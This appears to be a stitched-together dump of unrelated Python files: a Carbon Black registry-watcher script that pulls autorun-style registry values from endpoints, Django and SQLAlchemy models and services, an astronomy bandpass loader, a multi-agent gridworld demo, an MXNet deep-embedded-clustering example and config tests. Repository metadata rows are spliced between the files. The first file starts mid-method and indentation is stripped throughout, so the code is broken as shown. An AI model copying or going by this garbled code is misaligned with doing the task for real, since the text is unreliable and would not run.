# NOTE -- this is not very efficient in PYTHON, and should
# use a C parser to make this much, much faster.
# http://yz.mit.edu/wp/fast-native-c-protocol-buffers-from-python/
x = cpb.CbEventMsg()
x.ParseFromString(body)
if not x.regmod or x.regmod.action != 2:
# Check for MODIFICATION event because we will usually get
# a creation event and a modification event, and might as
# well go with the one that says data has actually been written.
return
regmod_path = None
if x.regmod.utf8_regpath:
if self.verbose:
                    print("Event arrived: |%s|" % x.regmod.utf8_regpath)
for regmod_regex in self.regmod_regexes:
if regmod_regex.match(x.regmod.utf8_regpath):
regmod_path = x.regmod.utf8_regpath
break
if regmod_path:
regmod_path = regmod_path.replace("\\registry\\machine\\", "HKLM\\")
regmod_path = regmod_path.replace("\\registry\\user\\", "HKEY_USERS\\")
regmod_path = regmod_path.strip()
# TODO -- more cleanup here potentially?
self.queue.put((x, regmod_path))
except:
traceback.print_exc()
def _worker_thread_loop(self):
while self.go:
try:
try:
(x, regmod_path) = self.queue.get(timeout=0.5)
                except queue.Empty:
continue
# TODO -- could comment this out if you want CSV data to feed into something
                print("--> Attempting for %s" % regmod_path)
# Go Grab it if we think we have something!
sensor_id = x.env.endpoint.SensorId
hostname = x.env.endpoint.SensorHostName
# TODO -- this could use some concurrency and work queues because we could wait a while for
# each of these to get established and retrieve the value
# Establish our CBLR session if necessary!
lrh = self._create_lr_session_if_necessary(sensor_id)
data = lrh.get_registry_value(regmod_path)
                print("%s,%s,%d,%s,%s,%s" % (time.asctime(),
                                             hostname,
                                             sensor_id,
                                             x.header.process_path,
                                             regmod_path,
                                             data.get('value_data', "") if data else "<UNKNOWN>"))
# TODO -- could *do something* here, like if it is for autoruns keys then go check the signature status
# of the binary at the path pointed to, and see who wrote it out, etc
except:
traceback.print_exc()

def main(cb, args):
username = args.get("username")
password = args.get("password")
regpaths_file = args.get("regpaths_file")
verbose = args.get("verbose", False)
if verbose:
# maybe you want to print out all the regpaths we're using?
        print("Regpaths file:", regpaths_file)
    f = open(regpaths_file, 'r')
regpaths_data = f.read()
f.close()
regmod_regexes = []
for line in regpaths_data.split('\n'):
line = line.strip()
if len(line) == 0:
continue
regmod_regexes.append(re.compile(line))
listener = RegistryModWatcherAndValueGrabber(args.get('server_url'), cb, username, password, regmod_regexes, verbose)
try:
if verbose:
            print("Registry Mod Watcher and Grabber -- started. Watching for:", regpaths_data)
else:
            print("Registry Mod Watcher and Grabber -- started. Watching for %d regexes" % len(regmod_regexes))
listener.process()
except KeyboardInterrupt:
        print("Caught Ctrl-C", file=sys.stderr)
listener.stop()
    print("Registry Mod Watcher and Grabber -- stopped.")

if __name__ == "__main__":
## YOU CAN USE data/autoruns_regexes.txt to test ##
required_args =[("-i", "--username", "store", None, "username", "CB messaging username"),
("-p", "--password", "store", None, "password", "CB messaging password"),
("-r", "--regpaths_file", "store", None, "regpaths_file", "File of newline delimited regexes for regpaths")]
optional_args = [("-v", "--verbose", "store_true", False, "verbose", "Enable verbose output")]
main_helper("Subscribe to message bus events and for each registry modification that matches one of our supplied regexes, go retrieve value.",
main,
custom_required=required_args,
custom_optional=optional_args)
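The core filtering idea of the script above — compile a file of registry-path regexes once, then `match()` each incoming event path against the list — can be sketched in isolation. The patterns and paths below are made-up illustrations, not taken from any real regpaths file:

```python
import re

# Hypothetical patterns in the style the script loads, one regex per line.
patterns = [re.compile(p) for p in (
    r".*\\currentversion\\run\\.*",
    r".*\\services\\.*\\imagepath",
)]

def matches_any(regpath, regexes):
    # re.match anchors at the start of the string, mirroring
    # regmod_regex.match(x.regmod.utf8_regpath) in consume_message().
    return any(rx.match(regpath) for rx in regexes)

hit = r"\registry\machine\software\microsoft\windows\currentversion\run\updater"
miss = r"\registry\machine\software\vendor\setting"
assert matches_any(hit, patterns)
assert not matches_any(miss, patterns)
```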

import torch
import functools
if torch.__version__.startswith('0'):
from .sync_bn.inplace_abn.bn import InPlaceABNSync
BatchNorm2d = functools.partial(InPlaceABNSync, activation='none')
BatchNorm2d_class = InPlaceABNSync
relu_inplace = False
else:
# BatchNorm2d_class = BatchNorm2d = torch.nn.SyncBatchNorm
BatchNorm2d_class = BatchNorm2d = torch.nn.BatchNorm2d
    relu_inplace = True

from django.db import models
from ordered_model.models import OrderedModel, OrderedModelBase
class Item(OrderedModel):
name = models.CharField(max_length=100)
class Question(models.Model):
pass
class TestUser(models.Model):
pass
class Answer(OrderedModel):
question = models.ForeignKey(Question, on_delete=models.CASCADE, related_name='answers')
user = models.ForeignKey(TestUser, on_delete=models.CASCADE, related_name='answers')
order_with_respect_to = ('question', 'user')
class Meta:
ordering = ('question', 'user', 'order')
def __unicode__(self):
return u"Answer #{0:d} of question #{1:d} for user #{2:d}".format(self.order, self.question_id, self.user_id)
class CustomItem(OrderedModel):
id = models.CharField(max_length=100, primary_key=True)
name = models.CharField(max_length=100)
modified = models.DateTimeField(null=True, blank=True)
class CustomOrderFieldModel(OrderedModelBase):
sort_order = models.PositiveIntegerField(editable=False, db_index=True)
name = models.CharField(max_length=100)
order_field_name = 'sort_order'
class Meta:
ordering = ('sort_order',)
class Topping(models.Model):
name = models.CharField(max_length=100)
class Pizza(models.Model):
name = models.CharField(max_length=100)
toppings = models.ManyToManyField(Topping, through='PizzaToppingsThroughModel')
class PizzaToppingsThroughModel(OrderedModel):
pizza = models.ForeignKey(Pizza, on_delete=models.CASCADE)
topping = models.ForeignKey(Topping, on_delete=models.CASCADE)
order_with_respect_to = 'pizza'
class Meta:
ordering = ('pizza', 'order')
class BaseQuestion(OrderedModel):
order_class_path = __module__ + '.BaseQuestion'
question = models.TextField(max_length=100)
class Meta:
ordering = ('order',)
class MultipleChoiceQuestion(BaseQuestion):
good_answer = models.TextField(max_length=100)
wrong_answer1 = models.TextField(max_length=100)
wrong_answer2 = models.TextField(max_length=100)
wrong_answer3 = models.TextField(max_length=100)
class OpenQuestion(BaseQuestion):
answer = models.TextField(max_length=100)

from app.db import db
# Ignore it if db can't find the row when updating/deleting
# Todo: not ignore it, raise some error, remove checkers in view
class BaseService:
__abstract__ = True
model = None
# Create
def add_one(self, **kwargs):
new_row = self.model(**kwargs)
db.session.add(new_row)
db.session.commit() # sqlalchemy auto flushes so maybe this just need commit ?
return new_row
# Read
def select_one(self, id):
return self.model.query.filter(self.model.id == id).one_or_none()
def select_all(self, conditions: list = None, sort_by=None, is_asc=None):
query = db.session.query(self.model)
if conditions is not None:
for condition in conditions:
query = query.filter(condition)
if sort_by is not None and is_asc is not None:
sort_column = self.model.__table__._columns[sort_by]
is_asc = is_asc == 'true'
if sort_column is not None:
query = query.order_by(sort_column.asc() if is_asc else sort_column.desc())
return query.all()
# Update
def update_one(self, id, updated):
row = self.model.query.filter(self.model.id == id)
row_result = row.one_or_none()
if row_result is not None:
row.update(updated)
db.session.commit()
return row.one_or_none()
# Delete
def delete_one(self, id):
row = self.select_one(id)
if row is not None:
db.session.delete(row)
db.session.commit()

# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
sbpy bandpass Module
"""
__all__ = [
'bandpass'
]
import os
from astropy.utils.data import get_pkg_data_filename
def bandpass(name):
"""Retrieve bandpass transmission spectrum from sbpy.
Parameters
----------
name : string
Name of the bandpass, case insensitive. See notes for
available filters.
Returns
-------
bp : `~synphot.SpectralElement`
Notes
-----
Available filters:
+-------------+---------------------------+
| Name | Source |
+=============+===========================+
| 2MASS J | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS H | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS Ks | Cohen et al. 2003 |
+-------------+---------------------------+
| Cousins R | STScI CDBS, v4 |
+-------------+---------------------------+
| Cousins I | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson U | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson B | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson V | STScI CDBS, v4 |
+-------------+---------------------------+
| PS1 g | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 r | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 i | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 w | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 y | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 z | Tonry et al. 2012 |
+-------------+---------------------------+
| SDSS u | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS g | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS r | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS i | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS z | SDSS, dated 2001 |
+-------------+---------------------------+
| WFC3 F438W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WFC3 F606W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WISE W1 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W2 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W3 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W4 | Jarrett et al. 2011 |
+-------------+---------------------------+
References
----------
.. [CDBS] Space Telescope Science Institute. HST Calibration Reference
Data System. https://hst-crds.stsci.edu/ .
.. [COH03] Cohen, M. et al. 2003. Spectral Irradiance Calibration
in the Infrared. XIV. The Absolute Calibration of 2MASS. AJ
126, 1090.
.. [JAR11] Jarrett, T. H. et al. 2011. The Spitzer-WISE Survey of
the Ecliptic Poles. ApJ 735, 112.
.. [SDSS] Sloan Digital Sky Survey. Camera.
www.sdss.org/instruments/camera .
.. [TON12] Tonry, J. L. et al. 2012. The Pan-STARRS1 Photometric
System. ApJ 750, 99.
"""
try:
import synphot
except ImportError:
raise ImportError('synphot is required.')
name2file = {
'2mass j': '2mass-j-rsr.txt',
'2mass h': '2mass-h-rsr.txt',
'2mass ks': '2mass-ks-rsr.txt',
'cousins r': 'cousins_r_004_syn.fits',
'cousins i': 'cousins_i_004_syn.fits',
'johnson u': 'johnson_u_004_syn.fits',
'johnson b': 'johnson_b_004_syn.fits',
'johnson v': 'johnson_v_004_syn.fits',
'ps1 g': 'ps1-gp1.txt',
'ps1 r': 'ps1-rp1.txt',
'ps1 i': 'ps1-ip1.txt',
'ps1 w': 'ps1-wp1.txt',
'ps1 y': 'ps1-yp1.txt',
'ps1 z': 'ps1-zp1.txt',
'sdss u': 'sdss-u.fits',
'sdss g': 'sdss-g.fits',
'sdss r': 'sdss-r.fits',
'sdss i': 'sdss-i.fits',
'sdss z': 'sdss-z.fits',
'wfc3 f438w': 'wfc3_uvis_f438w_004_syn.fits',
'wfc3 f606w': 'wfc3_uvis_f606w_004_syn.fits',
'wise w1': 'WISE-RSR-W1.EE.txt',
'wise w2': 'WISE-RSR-W2.EE.txt',
'wise w3': 'WISE-RSR-W3.EE.txt',
'wise w4': 'WISE-RSR-W4.EE.txt',
}
fn = get_pkg_data_filename(os.path.join(
'..', 'photometry', 'data', name2file[name.lower()]))
bp = synphot.SpectralElement.from_file(fn)
return bp

# Generated by Django 3.1.2 on 2020-10-18 17:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='GameScore',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_team', models.CharField(max_length=200)),
('second_team', models.CharField(max_length=200)),
('first_team_score', models.IntegerField(default=0)),
('second_team_score', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Player',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('number', models.IntegerField()),
('age', models.IntegerField()),
                ('position_in_field', models.CharField(choices=[('1', 'Goalkeeper'), ('2', 'Defense'), ('3', 'Midfield'), ('4', 'Attack')], max_length=200)),
],
),
migrations.CreateModel(
name='Team',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True)),
('details', models.TextField()),
],
),
]

import random
import magent
from magent.builtin.rule_model import RandomActor
import numpy as np
def init_food(env, food_handle):
tree = np.asarray([[-1,0], [0,0], [0,-1], [0,1], [1,0]])
third = map_size//4 # mapsize includes walls
for i in range(1, 4):
for j in range(1, 4):
base = np.asarray([third*i, third*j])
env.add_agents(food_handle, method="custom", pos=tree+base)
def neigbor_regen_food(env, food_handle, p=0.003):
coords = env.get_pos(food_handle)
rands = np.random.random(len(coords))
for i, pos in enumerate(coords):
if rands[i] > p:
continue
neighbor = np.asarray([[-1,0],[0,-1], [0,1], [1,0]])
regen_pos = [pos+neighbor[np.random.randint(0,4)]]
env.add_agents(food_handle, method="custom",
pos=regen_pos)
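The neighbor-selection step above picks one of the four von Neumann neighbors of a food cell uniformly at random. A standalone sketch of just that step (seeded here for repeatability, which the demo itself does not do):

```python
import numpy as np

neighbor = np.asarray([[-1, 0], [0, -1], [0, 1], [1, 0]])
rng = np.random.default_rng(0)  # seeded only to make the sketch repeatable
pos = np.asarray([10, 10])
regen_pos = pos + neighbor[rng.integers(0, 4)]
# A regenerated food cell is always at Manhattan distance 1 from its parent.
assert int(np.abs(regen_pos - pos).sum()) == 1
```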

if __name__ == "__main__":
gw = magent.gridworld
cfg = gw.Config()
map_size = 25
cfg.set({"map_width": map_size, "map_height": map_size})
agent_group = cfg.add_group(
cfg.register_agent_type(
name="agent",
attr={
'width': 1,
'length': 1,
'view_range': gw.CircleRange(4),
'can_gather': True}))
food_group = cfg.add_group(
cfg.register_agent_type(
"food",
attr={'width': 1,
'length': 1,
'can_be_gathered': True}))
# add reward rule
a = gw.AgentSymbol(agent_group, index='any')
b = gw.AgentSymbol(food_group, index='any')
e = gw.Event(a, 'collide', b)
cfg.add_reward_rule(e, receiver=a, value=1)
# cfg.add_reward_rule(e2, receiver=b, value=1, die=True)
# cfg.add_reward_rule(e3, receiver=[a,b], value=[-1,-1])
env = magent.GridWorld(cfg)
agent_handle, food_handle = env.get_handles()
model1 = RandomActor(env, agent_handle, "up")
env.set_render_dir("build/render")
env.reset()
upstart = [(map_size//2 - 2, map_size//2 - 2), (map_size//2 + 2, map_size//2 - 2),
(map_size//2, map_size//2), (map_size//2 - 2, map_size//2 + 2),
(map_size//2 + 2, map_size//2 + 2)]
# spawnrate = 0.1
env.add_agents(agent_handle, method="custom", pos=upstart)
# env.add_agents(rightgroup, method="custom", pos=rightstart)
init_food(env, food_handle)
k = env.get_observation(agent_handle)
    print(env.get_pos(agent_handle))
    print(len(env.get_pos(food_handle)))
done = False
step_ct = 0
r_sum = 0
while not done:
obs_1 = env.get_observation(agent_handle)
ids_1 = env.get_agent_id(agent_handle)
acts_1 = model1.infer_action(obs_1, ids_1)
env.set_action(agent_handle, acts_1)
# simulate one step
done = env.step()
# render
env.render()
# get reward
reward = sum(env.get_reward(agent_handle))
r_sum += reward
# clear dead agents
env.clear_dead()
neigbor_regen_food(env, food_handle)
# print info
# if step_ct % 10 == 0:
# print("step %d" % step_ct)
step_ct += 1
if step_ct > 250:
break
    print(r_sum) | 28 | 87 | 0.580201 | 458 | 3,192 | 3.818777 | 0.275109 | 0.056032 | 0.04574 | 0.046312 | 0.284734 | 0.174957 | 0.141795 | 0.129788 | 0.046312 | 0.046312 | 0 | 0.034378 | 0.280075 | 3,192 | 114 | 88 | 28 | 0.726719 | 0.107143 | 0 | 0.053333 | 0 | 0 | 0.048643 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.053333 | null | null | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
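The food-regeneration rule in `neigbor_regen_food` above can be sketched without the MAgent environment: each food tile spawns a new item at a uniformly random 4-neighbour with probability `p`. This is a minimal sketch; the helper name `regen_positions` and the seeded generator are illustrative, and map boundaries are ignored, just as in the demo.

```python
import numpy as np

# 4-neighbourhood offsets, as in neigbor_regen_food
NEIGHBORS = np.asarray([[-1, 0], [0, -1], [0, 1], [1, 0]])

def regen_positions(coords, p=0.003, rng=None):
    """Return positions of newly spawned food items (illustrative helper)."""
    rng = np.random.default_rng(0) if rng is None else rng
    new_pos = []
    for pos in np.asarray(coords):
        if rng.random() < p:  # regenerate this tile with probability p
            new_pos.append(pos + NEIGHBORS[rng.integers(0, 4)])
    return new_pos

# p=1.0 forces every tile to spawn a neighbour
spawned = regen_positions([[5, 5], [6, 6]], p=1.0)
```

Each spawned position sits at Manhattan distance 1 from its source tile.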
fe6407132244604eabc2321eb05eb24333b3bd82 | 669 | py | Python | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | pyTorch/utils.py | rajasekar-venkatesan/Deep_Learning | c375dab303f44043a4dc30ea53b298d7eca1d5a7 | [
"MIT"
] | null | null | null | import pandas as pd, numpy as np
from sklearn.preprocessing import OneHotEncoder
author_int_dict = {'EAP':0,'HPL':1,'MWS':2}
def load_train_test_data(num_samples=None):
train_data = pd.read_csv('../data/train.csv')
train_data['author'] = [author_int_dict[a] for a in train_data['author'].tolist()]
test_data = pd.read_csv('../data/test.csv')
return train_data[:num_samples],test_data[:num_samples]
def categorical_labeler(labels):
labels = labels.reshape(-1, 1)
#labels = OneHotEncoder().fit_transform(labels).todense()
labels = np.array(labels, dtype=np.int64)
return labels
if __name__ == '__main__':
pass | 33.45 | 87 | 0.689088 | 96 | 669 | 4.510417 | 0.5 | 0.083141 | 0.096998 | 0.083141 | 0.078522 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012567 | 0.167414 | 669 | 20 | 88 | 33.45 | 0.764811 | 0.083707 | 0 | 0 | 0 | 0 | 0.104377 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.071429 | 0.142857 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
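The label handling in `utils.py` above can be exercised in isolation: author strings map to integer ids via `author_int_dict`, and `categorical_labeler` reshapes them into an `int64` column vector (the one-hot branch is commented out upstream). A small sketch; the CSV loading is omitted and the author list here is illustrative.

```python
import numpy as np

author_int_dict = {'EAP': 0, 'HPL': 1, 'MWS': 2}

def categorical_labeler(labels):
    # reshape to a column vector of int64 ids, as in utils.py
    labels = np.asarray(labels).reshape(-1, 1)
    return np.array(labels, dtype=np.int64)

authors = ['EAP', 'MWS', 'HPL']
y = categorical_labeler([author_int_dict[a] for a in authors])
```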
fe64404bf937356d7de814318a6e0bdf49ea36b3 | 6,987 | py | Python | example/dec/dec.py | TheBurningCrusade/A_mxnet | fa2a8e3c438bea16b993e9537f75e2082d83346f | [
"Apache-2.0"
] | 159 | 2016-08-23T22:13:26.000Z | 2021-10-24T01:31:35.000Z | example/dec/dec.py | mrgloom/FaceDetection-ConvNet-3D | f9251c48eb40c5aec8fba7455115c355466555be | [
"Apache-2.0"
] | 10 | 2016-08-23T05:59:07.000Z | 2018-05-24T02:31:41.000Z | example/dec/dec.py | mrgloom/FaceDetection-ConvNet-3D | f9251c48eb40c5aec8fba7455115c355466555be | [
"Apache-2.0"
] | 77 | 2016-08-21T00:35:00.000Z | 2021-06-01T05:03:34.000Z | # pylint: skip-file
import sys
import os
# code to automatically download dataset
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path = [os.path.join(curr_path, "../autoencoder")] + sys.path
import mxnet as mx
import numpy as np
import data
from scipy.spatial.distance import cdist
from sklearn.cluster import KMeans
import model
from autoencoder import AutoEncoderModel
from solver import Solver, Monitor
import logging
def cluster_acc(Y_pred, Y):
    # sklearn.utils.linear_assignment_ was removed; SciPy's Hungarian
    # solver computes the same best label matching
    from scipy.optimize import linear_sum_assignment
    assert Y_pred.size == Y.size
    D = max(Y_pred.max(), Y.max())+1
    w = np.zeros((D,D), dtype=np.int64)
    for i in range(Y_pred.size):
        w[Y_pred[i], Y[i]] += 1
    row_ind, col_ind = linear_sum_assignment(w.max() - w)
    return w[row_ind, col_ind].sum()*1.0/Y_pred.size, w
class DECModel(model.MXModel):
class DECLoss(mx.operator.NumpyOp):
def __init__(self, num_centers, alpha):
super(DECModel.DECLoss, self).__init__(need_top_grad=False)
self.num_centers = num_centers
self.alpha = alpha
def forward(self, in_data, out_data):
z = in_data[0]
mu = in_data[1]
q = out_data[0]
self.mask = 1.0/(1.0+cdist(z, mu)**2/self.alpha)
q[:] = self.mask**((self.alpha+1.0)/2.0)
q[:] = (q.T/q.sum(axis=1)).T
def backward(self, out_grad, in_data, out_data, in_grad):
q = out_data[0]
z = in_data[0]
mu = in_data[1]
p = in_data[2]
dz = in_grad[0]
dmu = in_grad[1]
self.mask *= (self.alpha+1.0)/self.alpha*(p-q)
dz[:] = (z.T*self.mask.sum(axis=1)).T - self.mask.dot(mu)
dmu[:] = (mu.T*self.mask.sum(axis=0)).T - self.mask.T.dot(z)
def infer_shape(self, in_shape):
assert len(in_shape) == 3
assert len(in_shape[0]) == 2
input_shape = in_shape[0]
label_shape = (input_shape[0], self.num_centers)
mu_shape = (self.num_centers, input_shape[1])
out_shape = (input_shape[0], self.num_centers)
return [input_shape, mu_shape, label_shape], [out_shape]
def list_arguments(self):
return ['data', 'mu', 'label']
def setup(self, X, num_centers, alpha, save_to='dec_model'):
        sep = X.shape[0]*9//10
X_train = X[:sep]
X_val = X[sep:]
ae_model = AutoEncoderModel(self.xpu, [X.shape[1],500,500,2000,10], pt_dropout=0.2)
if not os.path.exists(save_to+'_pt.arg'):
ae_model.layerwise_pretrain(X_train, 256, 50000, 'sgd', l_rate=0.1, decay=0.0,
lr_scheduler=mx.misc.FactorScheduler(20000,0.1))
ae_model.finetune(X_train, 256, 100000, 'sgd', l_rate=0.1, decay=0.0,
lr_scheduler=mx.misc.FactorScheduler(20000,0.1))
ae_model.save(save_to+'_pt.arg')
logging.log(logging.INFO, "Autoencoder Training error: %f"%ae_model.eval(X_train))
logging.log(logging.INFO, "Autoencoder Validation error: %f"%ae_model.eval(X_val))
else:
ae_model.load(save_to+'_pt.arg')
self.ae_model = ae_model
self.dec_op = DECModel.DECLoss(num_centers, alpha)
label = mx.sym.Variable('label')
self.feature = self.ae_model.encoder
self.loss = self.dec_op(data=self.ae_model.encoder, label=label, name='dec')
self.args.update({k:v for k,v in self.ae_model.args.items() if k in self.ae_model.encoder.list_arguments()})
self.args['dec_mu'] = mx.nd.empty((num_centers, self.ae_model.dims[-1]), ctx=self.xpu)
self.args_grad.update({k: mx.nd.empty(v.shape, ctx=self.xpu) for k,v in self.args.items()})
self.args_mult.update({k: k.endswith('bias') and 2.0 or 1.0 for k in self.args})
self.num_centers = num_centers
def cluster(self, X, y=None, update_interval=None):
N = X.shape[0]
if not update_interval:
update_interval = N
batch_size = 256
test_iter = mx.io.NDArrayIter({'data': X}, batch_size=batch_size, shuffle=False,
last_batch_handle='pad')
args = {k: mx.nd.array(v.asnumpy(), ctx=self.xpu) for k, v in self.args.items()}
        z = list(model.extract_feature(self.feature, args, test_iter, N, self.xpu).values())[0]
kmeans = KMeans(self.num_centers, n_init=20)
kmeans.fit(z)
args['dec_mu'][:] = kmeans.cluster_centers_
solver = Solver('sgd', momentum=0.9, wd=0.0, learning_rate=0.01)
def ce(label, pred):
return np.sum(label*np.log(label/(pred+0.000001)))/label.shape[0]
solver.set_metric(mx.metric.CustomMetric(ce))
label_buff = np.zeros((X.shape[0], self.num_centers))
train_iter = mx.io.NDArrayIter({'data': X}, {'label': label_buff}, batch_size=batch_size,
shuffle=False, last_batch_handle='roll_over')
self.y_pred = np.zeros((X.shape[0]))
def refresh(i):
if i%update_interval == 0:
                z = list(model.extract_feature(self.feature, args, test_iter, N, self.xpu).values())[0]
p = np.zeros((z.shape[0], self.num_centers))
self.dec_op.forward([z, args['dec_mu'].asnumpy()], [p])
y_pred = p.argmax(axis=1)
                print(np.std(np.bincount(y_pred)), np.bincount(y_pred))
                print(np.std(np.bincount(y.astype(int))), np.bincount(y.astype(int)))
if y is not None:
print(cluster_acc(y_pred, y)[0])
weight = 1.0/p.sum(axis=0)
weight *= self.num_centers/weight.sum()
p = (p**2)*weight
train_iter.data_list[1][:] = (p.T/p.sum(axis=1)).T
                print(np.sum(y_pred != self.y_pred), 0.001*y_pred.shape[0])
if np.sum(y_pred != self.y_pred) < 0.001*y_pred.shape[0]:
self.y_pred = y_pred
return True
self.y_pred = y_pred
solver.set_iter_start_callback(refresh)
solver.set_monitor(Monitor(50))
solver.solve(self.xpu, self.loss, args, self.args_grad,
train_iter, 0, 1000000000, {}, False)
self.end_args = args
if y is not None:
return cluster_acc(self.y_pred, y)[0]
else:
return -1
def mnist_exp(xpu):
X, Y = data.get_mnist()
dec_model = DECModel(xpu, X, 10, 1.0, 'data/mnist')
acc = []
for i in [10*(2**j) for j in range(9)]:
acc.append(dec_model.cluster(X, Y, i))
logging.log(logging.INFO, 'Clustering Acc: %f at update interval: %d'%(acc[-1], i))
logging.info(str(acc))
logging.info('Best Clustering ACC: %f at update_interval: %d'%(np.max(acc), 10*(2**np.argmax(acc))))
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
mnist_exp(mx.gpu(0))
| 44.788462 | 116 | 0.586232 | 1,067 | 6,987 | 3.665417 | 0.208997 | 0.028126 | 0.035796 | 0.013296 | 0.284838 | 0.207875 | 0.157504 | 0.12631 | 0.117617 | 0.094605 | 0 | 0.033561 | 0.266495 | 6,987 | 156 | 117 | 44.788462 | 0.729561 | 0.008015 | 0 | 0.128571 | 0 | 0 | 0.041276 | 0 | 0 | 0 | 0 | 0 | 0.021429 | 0 | null | null | 0 | 0.085714 | null | null | 0.028571 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
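The soft assignment computed in `DECLoss.forward` above is a Student's t kernel between embeddings and cluster centres, normalised per row: q_ij is proportional to (1 + ||z_i - mu_j||^2/alpha)^(-(alpha+1)/2). A sketch in plain NumPy (the original uses `scipy.spatial.distance.cdist`; the name `soft_assign` is illustrative):

```python
import numpy as np

def soft_assign(z, mu, alpha=1.0):
    # squared Euclidean distances between every embedding and centre
    d2 = ((z[:, None, :] - mu[None, :, :]) ** 2).sum(-1)
    # Student's t kernel, as in DECLoss.forward
    mask = 1.0 / (1.0 + d2 / alpha)
    q = mask ** ((alpha + 1.0) / 2.0)
    return (q.T / q.sum(axis=1)).T  # rows sum to 1

z = np.array([[0.0, 0.0], [2.0, 2.0]])
mu = np.array([[0.0, 0.0], [2.0, 2.0]])
q = soft_assign(z, mu)  # each point is closest to "its own" centre
```

With `alpha=1.0` the exponent is 1, so the first row works out to [0.9, 0.1]: the t kernel gives 1 for the matching centre and 1/9 for the centre at squared distance 8.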
fe6806edfc8769087714d9060a7456450c7a5f90 | 1,608 | py | Python | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | null | null | null | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | 2 | 2022-02-05T12:15:03.000Z | 2022-03-27T09:55:51.000Z | tests/env_config/test_base.py | DAtek/datek-app-utils | 4783345d548bd85b1f6f99679be30b978e368e0e | [
"MIT"
] | null | null | null | from pytest import raises
from datek_app_utils.env_config.base import BaseConfig
from datek_app_utils.env_config.errors import InstantiationForbiddenError
class SomeOtherMixinWhichDoesntRelateToEnvConfig:
color = "red"
class TestConfig:
def test_iter(self, monkeypatch, key_volume, base_config_class):
volume = 5
monkeypatch.setenv(key_volume, str(volume))
class Config(SomeOtherMixinWhichDoesntRelateToEnvConfig, base_config_class):
TYPE: str
items = [item for item in Config]
assert len(items) == 5
assert Config.color == "red"
assert items[0].name == "TYPE"
assert items[0].value is None
assert items[0].type == str
assert items[1].name == "FIELD_WITH_DEFAULT_VALUE"
assert items[1].value == "C"
assert items[1].type == str
assert items[2].name == "NON_MANDATORY_FIELD"
assert items[2].value is None
assert items[2].type == str
assert items[3].name == "TYPED_NON_MANDATORY_FIELD"
assert items[3].value is None
assert items[3].type == str
assert items[4].name == "VOLUME"
assert items[4].value == volume
assert items[4].type == int
def test_get(self, monkeypatch, key_volume, base_config_class):
volume = 10
monkeypatch.setenv(key_volume, str(volume))
assert getattr(base_config_class, "VOLUME") == volume
def test_constructor_is_forbidden(self):
class Config(BaseConfig):
pass
with raises(InstantiationForbiddenError):
Config()
